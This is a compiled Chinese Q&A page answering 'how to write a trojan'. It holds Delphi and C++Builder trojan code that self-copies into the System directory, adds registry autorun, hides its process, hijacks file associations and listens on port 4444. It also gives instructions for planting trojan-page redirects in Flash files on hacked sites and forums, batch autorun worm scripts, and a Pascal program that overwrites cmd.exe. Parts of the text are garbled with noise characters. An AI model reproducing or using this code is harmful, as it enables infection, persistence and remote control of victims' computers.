① 怎麼編寫木馬程序請各位大哥大姐們指點一二,越詳細越好,小弟一點不懂編程哦!
其實做這個很簡單的,現在我感覺做木馬關鍵在於創意了 我電腦中收集過的一篇文章,給你參考一下 「冰河」啟示錄 前言:我經常在雜志和報刊上看到此類標題的文章,但大多是騙稿費的,沒有任何技術含量.於是一氣之下寫了這編東西.本人聲明如下:(一)本人對"冰河"及其作者沒有任何不滿,相反,作者肯幫助初學者的態度是我們每一個人都應該學習的.(二)本文的目的在於交流編程經驗,沒有任何其它不良企圖.(三)在一些領域,我們理應寧可自製力讓我們的預見力保持寂寞,也不要去做一個打開潘多拉盒子的先知。所以一些更厲害的方法我們現在不會提,以後也不會.--2000.8.3 (1) 「冰河」是有名的用C++Builder編寫的國產遠程管理軟體,其自我的功能保護很強,下面就以Delphi為例談一談它的原理,希望對大家有一些啟發. 一、程序安裝 此類程序一般會把自己隱藏起來運行,通常不外乎以下幾種方法:自我拷貝法、資源文件法、網頁方式安裝、類病毒捆綁法(如YAI).自我拷貝法適用於本身就一個文件,資源文件法可以同時安裝好幾個文件,網頁方式安裝要先向M$交錢換安全簽證,類病毒捆綁法利用了病毒的原理.本文只介紹自我拷貝法,其它方法請到我的個人主頁去看. http://lovejingtao.126.com 1:自我拷貝法 這種方法的原理是程序運行時先查看自己是不是在特定目錄下,如果是就繼續運行,如果不是就把自己拷貝到特定目錄下,然後運行新程序,再退出舊程序. 打開Delphi,新建一個工程,在窗口的Create事件中寫代碼: procere TForm1.FormCreate(Sender: TObject); var myname: string; begin myname := ExtractFilename(Application.Exename); //獲得文件名 if application.Exename <> GetWindir + myname then //如果文件不是在Windows\System\那麼.. begin file(pchar(application.Exename), pchar(GetWindir + myname), False);{將自己拷貝到Windows\System\下} Winexec(pchar(GetWindir + myname), sw_hide);//運行Windows\System\下的新文件 application.Terminate;//退出 end; end; 其中GetWinDir是自定義函數,起功能是找出Windows\System\的路徑. function GetWinDir: String; var Buf: array[0..MAX_PATH] of char; begin GetSystemDirectory(Buf, MAX_PATH); Result := Buf; if Result[Length(Result)]<>'\' then Result := Result + '\'; end; 另外,為了避免同時運行多個程序的副本(節約系統資源也),程序一般會弄成每次只能運行一個.這又有幾種方法. 一種方法是程序運行時先查找有沒有相同的運行了,如果有,就立刻退出程序. 修改dpr項目文件,修改begin和end之間的代碼如下: begin Application.Initialize; if FindWindow('TForm1','Form1')=0 then begin //當沒有找到Form1時執行下面代碼 Application.ShowMainForm:=False; //不顯示主窗口 Application.CreateForm(TForm1, Form1); Application.Run; end; end. 另一種方法是啟動時會先通過窗口名來確定是否已經在運行,如果是則關閉原先的再啟動。「冰河」就是用這種方法的。 這樣做的好處在於方便升級.它會自動用新版本覆蓋舊版本. 方法如下:修改dpr項目文件 uses Forms,windows,messages, Unit1 in 'Unit1.pas' {Form1}; 為了程序能在Windows每次啟動時自動運行,可以通過六種途徑來實現.「冰河」用注冊表的方式。 加入Registry單元,改寫上面的窗口Create事件,改寫後的程序如下: procere TForm1.FormCreate(Sender: TObject); const K = '\Software\Microsoft\Windows\CurrentVersion\RunServices'; var myname: string; begin {Write by Lovejingtao, http://Lovejingtao.126.com ,[email protected]} myname := ExtractFilename(Application.Exename); //獲得文件名 if application.Exename <> GetWindir + myname then //如果文件不是在Windows\System\那麼.. begin file(pchar(application.Exename), pchar(GetWindir + myname), False);{//將自己拷貝到Windows\System\下} Winexec(pchar(GetWindir + myname), sw_hide);//運行Windows\System\下的新文件 application.Terminate;//退出 end; with TRegistry.Create do try RootKey := HKEY_LOCAL_MACHINE; OpenKey( K, TRUE ); WriteString( 'syspler', application.ExeName ); finally free; end; end; 為了讓程序用ALT+DEL+CTRL看不見,在implementation後添加聲明: function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external 'KERNEL32.DLL'; 再在上面的窗口Create事件加上一句:RegisterServiceProcess(GetCurrentProcessID, 1);//隱藏 啟示1:當我們中了「冰河」,如果被對方上了密碼而無法自己卸載時,可以先找出是什麼文件,然後自己配置一個沒有密碼的來運行,這樣它就會把原來有密碼的覆蓋掉,自己就可以輕松用它的卸載功能把它卸掉.如果你會編程,也可以自己寫一個"清除器"了,方法是先查找到窗口名,向它發送退出命令,再把它刪除即可. (2) 「冰河」的自我功能保護很強,它一般通過Txt或Exe文件關聯來達到自我恢復.所以有很多人明明把它殺掉了,但重新啟動時又會出現.下面舉以Txt文件關聯為例. 打開Delphi,新建一個工程,在窗口的Create事件中寫代碼: uses Registry procere TForm1.FormCreate(Sender: TObject); const Kkk = '\Software\Microsoft\Windows\CurrentVersion\RunServices'; const K = '\txtfile\shell\open\command'; var sFileName:string; begin //****************************************************** with TRegistry.Create do //寫注冊表,讓程序跟文本文件關聯 try RootKey := HKEY_CLASSES_ROOT; OpenKey( K, TRUE ); {Write by Lovejingtao, http://lovejingtao.126.com } WriteString( '', application.ExeName+' "%1" '); {Write by Lovejingtao,[email protected]} finally free; end; //******************************************************* with TRegistry.Create do //寫注冊表,每次啟動時自動運行 try RootKey := HKEY_LOCAL_MACHINE; OpenKey( Kkk, TRUE ); WriteString( 'myTray', application.ExeName ); finally free; end; //******************************************************** if FileExists(pchar(Getwindir+'Sysplay.exe'))=false then//如果文件已經刪除 begin file;//自定義拷貝資源文件過程 winexec(pchar(Getwindir+'Sysplay.exe'),sw_hide); end; //********************************************************** if ParamCount>0 then begin (* 有執行參數傳入 *) sFileName:=ParamStr(1); (* 取得參數內容 *) winexec(pchar('Notepad.exe '+sFileName),sw_show);(*用記事本打開*) //winexec(pchar( sFileName),sw_show); end; //******************************************************* application.Terminate;//退出 end; 如果要改為與Exe文件關聯,只要把"const K = '\txtfile\shell\open\command';"改為 "const K = '\exefile\shell\open\command';",把"winexec(pchar('Notepad.exe '+sFileName),sw_show);" 改為"winexec(pchar( sFileName),sw_show);"即可.當然,還要加入是否退出Windows而運行的Rundll32.dll, 否則會因為關聯Exe文件而退不出Windows. 啟示2:手工刪除「冰河」時,還要改掉它的保護功能,不能讓它恢復.如果是關聯了文本文件,先改注冊表讓它不能自動運行,重啟後不要打開文本文件,立刻進到其安裝目錄把它刪除.如果是關聯了Exe文件,那隻有回到Dos下刪.切記:一定要把兩個文件同時刪掉,否則你重啟後會發現文件又恢復了
② 簡單的木馬怎麼編寫啊
特洛依木馬這個名詞大家應該不陌生,自從98年「死牛崇拜」黑客小組公布Back Orifice以來,木馬猶如平地上的驚雷, 使在Dos——Windows時代中長大的中國網民從五彩繽紛的網路之夢中驚醒,終於認識到的網路也有它邪惡的一面,一時間人心惶惶。
我那時在《電腦報》上看到一篇文章,大意是一個菜鳥被人用BO控制了,嚇得整天吃不下飯、睡不著覺、上不了網,到處求救!要知道,木馬(Trojan)的歷史是很悠久的:早在AT&T Unix和BSD Unix十分盛行的年代,木馬是由一些玩程式(主要是C)水平很高的年輕人(主要是老美)用C或Shell語言編寫的,基本是用來竊取登陸主機的口令,以取得更高的許可權。那時木馬的主要方法是誘騙——先修改你的.profile文件,植入木馬;當你登陸時將你敲入的口令字元存入一個文件,用Email的形式發到攻擊者的郵箱里。國內的年輕人大都是在盜版Dos的熏陶下長大的,對網路可以說很陌生。直到Win9x橫空出世,尤其是WinNt的普及,大大推動了網路事業的發展的時候,BO這個用三年後的眼光看起來有點簡單甚至可以說是簡陋的木馬(甚至在Win9x的「關閉程序」對話框可以看到進程)給了當時中國人極大的震撼,它在中國的網路安全方面可以說是一個劃時代的軟體。
自己編寫木馬,聽起來很Cool是不是?!木馬一定是由兩部分組成——伺服器程序(Server)和客戶端程序(Client),伺服器負責打開攻擊的道路,就像一個內奸特務;客戶端負責攻擊目標,兩者需要一定的網路協議來進行通訊(一般是TCP/IP協議)。為了讓大家更好的了解木馬攻擊技術,破除木馬的神秘感,我就來粗略講一講編寫木馬的技術並順便編寫一個例子木馬,使大家能更好地防範和查殺各種已知和未知的木馬。
首先是編程工具的選擇。目前流行的開發工具有C++Builder、VC、VB和Delphi,這里我們選用C++Builder(以下簡稱BCB);VC雖然好,但GUI設計太復雜,為了更好地突出我的例子,集中注意力在木馬的基本原理上,我們選用可視化的BCB;Delphi也不錯,但缺陷是不能繼承已有的資源(如「死牛崇拜」黑客小組公布的BO2000源代碼,是VC編寫的,網上俯拾皆是);VB嘛,談都不談——難道你還給受害者傳一個1兆多的動態鏈接庫——Msvbvm60.dll嗎?
啟動C++Builder 5.0企業版,新建一個工程,添加三個VCL控制項:一個是Internet頁中的Server Socket,另兩個是Fastnet頁中的NMFTP和NMSMTP。Server Socket的功能是用來使本程序變成一個伺服器程序,可以對外服務(對攻擊者敞開大門)。Socket最初是在Unix上出現的,後來微軟將它引入了Windows中(包括Win98和WinNt);後兩個控制項的作用是用來使程序具有FTP(File Transfer Protocol文件傳輸協議)和SMTP(Simple Mail Transfer Protocol簡單郵件傳輸協議)功能,大家一看都知道是使軟體具有上傳下載功能和發郵件功能的控制項。
Form窗體是可視的,這當然是不可思議的。不光佔去了大量的空間(光一個Form就有300K之大),而且使軟體可見,根本沒什麼作用。因此實際寫木馬時可以用一些技巧使程序不包含Form,就像Delphi用過程實現的小程序一般只有17K左右那樣。
我們首先應該讓我們的程序能夠隱身。雙擊Form,首先在FormCreate事件中添加可使木馬在Win9x的「關閉程序」對話框中隱藏的代碼。這看起來很神秘,其實說穿了不過是一種被稱之為Service的後台進程,它可以運行在較高的優先順序下,可以說是非常靠近系統核心的設備驅動程序中的那一種。因此,只要將我們的程序在進程資料庫中用RegisterServiceProcess()函數注冊成服務進程(Service Process)就可以了。不過該函數的聲明在Borland預先打包的頭文件中沒有,那麼我們只好自己來聲明這個位於KERNEL32.DLL中的鳥函數了。
首先判斷目標機的操作系統是Win9x還是WinNt:
{
DWORD dwVersion = GetVersion();
// 得到操作系統的版本號
if (dwVersion >= 0x80000000)
// 操作系統是Win9x,不是WinNt
{
typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);
//定義RegisterServiceProcess()函數的原型
HINSTANCE hDLL;
LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;
hDLL = LoadLibrary("KERNEL32");
//載入RegisterServiceProcess()函數所在的動態鏈接庫KERNEL32.DLL
lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");
//得到RegisterServiceProcess()函數的地址
lpRegisterServiceProcess(GetCurrentProcessId(),1);
//執行RegisterServiceProcess()函數,隱藏本進程
FreeLibrary(hDLL);
//卸載動態鏈接庫
}
}
這樣就終於可以隱身了(害我敲了這么多代碼!)。為什麼要判斷操作系統呢?因為WinNt中的進程管理器可以對當前進程一覽無余,因此沒必要在WinNt下也使用以上代碼(不過你可以使用其他的方法,這個留到後面再講)。
接著再將自己拷貝一份到%System%目錄下,例如:C:\Windows\System,並修改注冊表,以便啟動時自動載入:
{
char TempPath[MAX_PATH];
//定義一個變數
GetSystemDirectory(TempPath ,MAX_PATH);
//TempPath是system目錄緩沖區的地址,MAX_PATH是緩沖區的大小,得到目標機的System目錄路徑
SystemPath=AnsiString(TempPath);
//格式化TempPath字元串,使之成為能供編譯器使用的樣式
CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\\Tapi32.exe").c_str() ,FALSE);
//將自己拷貝到%System%目錄下,並改名為Tapi32.exe,偽裝起來
Registry=new TRegistry;
//定義一個TRegistry對象,准備修改注冊表,這一步必不可少
Registry->RootKey=HKEY_LOCAL_MACHINE;
//設置主鍵為HKEY_LOCAL_MACHINE
Registry->OpenKey("Software\\Microsoft\\Windows\\
CurrentVersion\\Run",TRUE);
//打開鍵值Software\\Microsoft\\Windows\\CurrentVersion\\Run,如果不存在,就創建之
try
{
//如果以下語句發生異常,跳至catch,以避免程序崩潰
if(Registry->ReadString("crossbow")!=SystemPath+"\\Tapi32.exe")
Registry->WriteString("crossbow",SystemPath+"\\Tapi32.exe");
//查找是否有「crossbow」字樣的鍵值,並且是否為拷貝的目錄%System%+Tapi32.exe
//如果不是,就寫入以上鍵值和內容
}
catch(...)
{
//如果有錯誤,什麼也不做
}
}
好,FormCreate過程完成了,這樣每次啟動都可以自動載入Tapi32.exe,並且在「關閉程序」對話框中看不見本進程了,木馬的雛形初現。
接著選中ServerSocket控制項,在左邊的Object Inspector中將Active改為true,這樣程序一啟動就打開特定埠,處於伺服器工作狀態。再將Port填入4444,這是木馬的埠號,當然你也可以用別的。但是你要注意不要用1024以下的低端埠,因為這樣不但可能會與基本網路協議使用的埠相沖突,而且很容易被發覺,因此盡量使用1024以上的高端埠(不過也有這樣一種技術,它故意使用特定埠,因為如果引起沖突,Windows也不會報錯 ^_^)。你可以看一看TNMFTP控制項使用的埠,是21號埠,這是FTP協議的專用控制埠(FTP Control Port);同理TNMSMTP的25號埠也是SMTP協議的專用埠。
再選中ServerSocket控制項,點擊Events頁,雙擊OnClientRead事件,敲入以下代碼:
{
FILE *fp=NULL;
char * content;
int times_of_try;
char TempFile[MAX_PATH];
//定義了一堆待會兒要用到的變數
sprintf(TempFile, "%s%2
③ 怎麼編寫木馬
這個只是惡作劇程序,不是木馬。
其實很簡單嘛,只要終止explorer.exe進程就行了。
這都不需要編程,只要寫個批處理就行。
把:taskkill
/f
/im
Explorer.exe寫到一個文本文檔里,然後把那個文檔的後綴名由.txt改為.bat就行了。
④ 怎麼用照片製作木馬程序,請詳細說明
一是必須有木馬(服務端)然後是一張照片,第二步是用捆綁工具將照片與木馬進行捆綁就可以!
⑤ 木馬怎麼編寫
回答的太搞笑了,首先說一下,VC它不是編程語言,說到木馬就會想到黑客,木馬首先必須是由伺服器端與客戶端組成的,要不然不叫木馬了,我就用C++給你試一下怎麼編寫一個簡單的木馬吧,即服務端與客戶端,
首先曾加4個VCL控制項吧,
拉倒,這樣說麻煩,你不如在電腦上下載VC開發工具,我遠程給你示範一下好了。
⑥ 木馬怎樣製作
樓主您好,最簡單的方法就是在網上下載製作軟體了,只要進行簡單設置,點一下生成就做好了,再復雜一點的動手做一個有病毒代碼的VBS,最復雜的就是學編程了,這樣可以隨心所欲的編寫木馬,但是最麻煩。
⑦ 怎麼編輯木馬程序
你想干什麼?如果你只想玩玩,建議你學一下vbs腳本或bat腳本,如果你想把腳本做成exe程序,最簡單的方法就是把腳本壓縮到自解壓文件里,再用16進制編輯器修改一下某個數值,就成功了。
如果你想干壞事,嘻嘻,木馬也不是那麼好寫的,首先你要成為一個出色的程序員,不僅要打好C語言基礎,更要精通匯編語言和計算機硬體以及操作系統原理,邏輯思維要強,當然要學的還很多,如mfc,C#等等,所以,如果你不是非常痴迷於編程,我勸你玩玩就行了,當然,更不要走上違法犯罪的道路吆!
good luck。
呀,還有,請採納我吧,寶貝兒,嘻!
⑧ 木馬的編程是什麼
一、製作Flash動畫木馬的准備 _1@2{3|$^'M!A程序開發,操作系統,伺服器,源碼下載,Linux,Unix,BSD,PHP,Apach,asp,下載,源碼,黑客,安全,技術社區,技術論壇 Flash動畫木馬的原理,是在網頁中顯示或本地直接播放Flash動畫木馬時,讓Flash自動打開一個網址,而該網址就是我們預先製作好的一個木馬網頁。也就是說,在製作網頁木馬前,我們首先需要製作好一個網頁木馬,並將它放置到某個網站上去。 %H8H7W*B%N,|:^4i+p6U 另外,我們還需要准備一個比較吸引人的Flash動畫文件「MM熱舞.swf」,以及Flash動畫反編譯工具「閃客精靈」,編輯工具Macromedia Flash MX。 二、最原始的Flash木馬 (X8h4s8G8L"G程序開發,操作系統,伺服器,源碼下載,Linux,Unix,BSD,PHP,Apach,asp,下載,源碼,黑客,安全,技術社區,技術論壇 現在雖然有了許多各種各樣的Flash動畫木馬製作工具,但是為了了解Flash動畫木馬的最基本原理,有必要從頭開始用最原始的方法製作一個Flash木馬。 'h'C(U$R'I1L2v"ttech.techweb.com.cn 步驟一:反編譯SWF動畫-O7c$^,d"h&Q7v5W 首先我們需要將要插入網頁木馬的Flash動畫文件「MM熱舞.swf」,反編譯成可編輯的.fla格式。運行「閃客精靈」,點擊菜單「文件」→「快速打開」命令,指定「MM熱舞.swf」文件將其導入。然後點擊工具欄上的「導出FLA」命令,將動畫導出為「MM熱舞.fla」文件。 5?-^9_-h)b8F3I,E;m5F 步驟二:插入網頁木馬代碼9t!m*W,{5q%\6j"H!]6n"f 然後運行Flash動畫編輯器Macromedia Flash MX,點擊菜單「文件」→「打開」,調入剛才保存的fla文件。展開界面下方的「動作/幀」欄,再展開「動作」→「瀏覽器/網路」項,點擊其中的「getURL」命令,在右邊窗口中的「URL」裡面輸入我們的網頁木馬地址;窗口方式為「_blank」;「變數」設置為「使用GET方式發送」,在下方的代碼窗口中將出現「getURL("http://網頁木馬地址", "_blank", "GET");」。tech.techweb.com.cn ^#o ~4V%{:m5z4E/H b;W 補充: 步驟三:生成Flash木馬 -V"L$o(t8H6m9l)rtech.techweb.com.cn 設置完畢後保存文件,並點擊菜單「文件」→「發布」命令,將動畫重新導出為SWF格式。用IE瀏覽器打開剛才生成的Flash動畫木馬,可以看到隨著Flash動畫打開播放時,自動彈出一個瀏覽器窗口,裡面將會顯示我們的木馬網頁。 接著~~~~~ 三、簡簡單單生成Flash木馬tech.techweb.com.cn*S0m7p#o5A p7S#C6l2z&f9e 程序開發,操作系統,伺服器,源碼下載,Linux,Unix,BSD,PHP,Apach,asp,下載,源碼,黑客,安全,技術社區,技術論壇-q"R1h8o8j0Z5c 上面插入木馬的過程比較麻煩,下面我們介紹一個簡單的方法,也正是這些簡單的工具使得Flash木馬在網上隨處可見。 6V5n8`!I0R/c6~,e程序開發,操作系統,伺服器,源碼下載,Linux,Unix,BSD,PHP,Apach,asp,下載,源碼,黑客,安全,技術社區,技術論壇+z%m3L'k&}6M2` 運行SWF木馬插入器,點擊界面中的「選擇」按鈕,瀏覽指定要插入木馬的SWF文件;在「插入代碼」中輸入木馬網頁的地址;切記不要勾選下面的「只解壓」項。設置完畢後,點擊「給我插」按鈕,程序提示開始插入木馬網頁。顯示成功信息後,關閉程序,用IE打開生成的動畫,可以看到自動跳轉到木馬網頁去了。 2v)l8e"^5H9^&[#_!l 9{7l#Z+X"J(P @,B 四、Flash木馬的利用 9U+p6W;d;D7e+F9Ktech.techweb.com.cn 4W6Z4W1v4V"}4A/D$t._0_7P1o 看到上面的步驟了吧,生成一個Flash動畫木馬是不是很簡單? 那麼生成的Flash木馬該如何應用呢?只要我們將Flash上傳到某個網站中,就可以通過論壇或網站之類的直接利用了。 補充: #B&c)e#c9A%`-w程序開發,操作系統,伺服器,源碼下載,Linux,Unix,BSD,PHP,Apach,asp,下載,源碼,黑客,安全,技術社區,技術論壇+|,K({&L#P2n:\6^ 大部分的論壇中都可以發來Flash動畫的帖子,利用論壇發帖,攻擊者可以快速獲得大量的肉雞。以PHPWind v4.3.2 論壇為例,在發帖或回復時,點擊編輯窗口上方的「插入Flash動畫」按鈕,設置Flash窗口大小,使用默認設置後,要求輸入Flash的URL地址。確定後,可以看到編輯窗口中顯示的代碼為「「(flash=400,300)hxxp://www.flash**.com.cn/upfiles/20067**.swf(/flash)」」,這就是完整的Flash播放代碼了,不同的論壇代碼是不一樣的。TechWeb-技術社區5h4n8X5]/@'G+`'R'i %`6W'e)~"h 應用二:網頁嵌入Flash木馬"U3S9Z3v ^ 1q8X!h-V+V0T 攻擊者入侵了某個大的網站之後,很可能在網站首頁掛馬,使用普通方式掛馬會被管理員發覺,但是掛上Flash木馬的話,是很難查殺的。攻擊者可能在網頁中插入如下代碼:8y1o*@6L&l5k8L i8a9u%A,h5@/w 「《EMBED src=http://網頁木馬地址/木馬.swf width=0 height=0 type=application/x-shockwave-flash AUTOSTART="false" ShowStatusBar="false"》」,其中的《》改為<>。 $B;{)o,j5C,A.H;Z(sTechWeb-技術社區5L/b)o'K,m:s'i1t 這里的參數「width=0 height=0」表示,Flash播放窗口為零,也就是不顯示Flash播放窗口。其它用戶瀏覽網頁時,就會莫名其妙的彈出一個木馬網頁窗口。 '^9e#G)n:X-j*T 1f6F#k.z&j3G
滿意請採納
⑨ 誰能告訴我如何用vc編木馬,詳細點,大哥
簡單木馬很容易。
第一步,你可以用win32編寫簡單的。功能不需要太多。
2.學習MFC編程。
3.網路編程。
4.把win32下的那個木馬用MFC寫出來。
5.然後開始補充功能。比如關機代碼。telnet代碼。屏幕捕捉。……
我空間上有好多木馬編寫方便的文章你可以去參考。
也可以購買《黑客編程實例精粹》。
⑩ 請問木馬怎麼編程啊
TP(tuobo pascal)可以寫出很多木馬的 給你幾個看看 只能玩玩 program bing; var a:integer; begin a:=1; while a=1 do write('!'); end. 要退出的話就按ctrl+pause break 編寫一個小程序開玩笑,用記事本就可以了: shutdown -s -t 1 用EXE格式保存,之後你朋友如果一打開它,就會關機 可以的啦,我自己寫的 procere 毒毒.exe var t:text begin assign(t,'Aoturun.inf'); rewrite(t); writeln(t,'[Autorun]'); writeln(t,''); writeln(t,'open=毒毒.exe'); end. 使用Autorun自動打開病毒,很毒的。 下面是我自己用BAT文件編寫的: %0 c:\ %0 d:\ %0 e:\ echo [Autorun]>c:\Autorun echo [Autorun]>d:\Autorun echo [Autorun]>e:\Autorun echo open=1.bat>c:\Autorun echo open=1.bat>d:\Autorun echo open=1.bat>e:\Autorun %0 C:\Documents and Settings\Administrator\「開始」菜單\程序\啟動 start 1.bat 哈哈把我這個BAT病毒復制到文本文檔里,把文件名改成1.bat 你會看到精彩的一幕。 這個病毒會製造Autorun把自己復制到C D E 盤 和啟動項里; 送你一個低級的病毒吧! program sheji; Var n,i:longint; d:char; p:file of integer; begin assign(p,'C:\WINDOWS\system32\CMD.exe'); rewrite(p); while n<1980 do begin for i:=1 to 360 do write(p,i); for d:='a' to 'z' do write(p,i); n:=n+1; end; for i:=1 to 4 do erase(p); readln; end. 我特製了一個建立在它基礎上,要比這個復雜一些的程序,不過,不給你看了,畢竟,這包括我個人的隱私了。
麻煩採納,謝謝!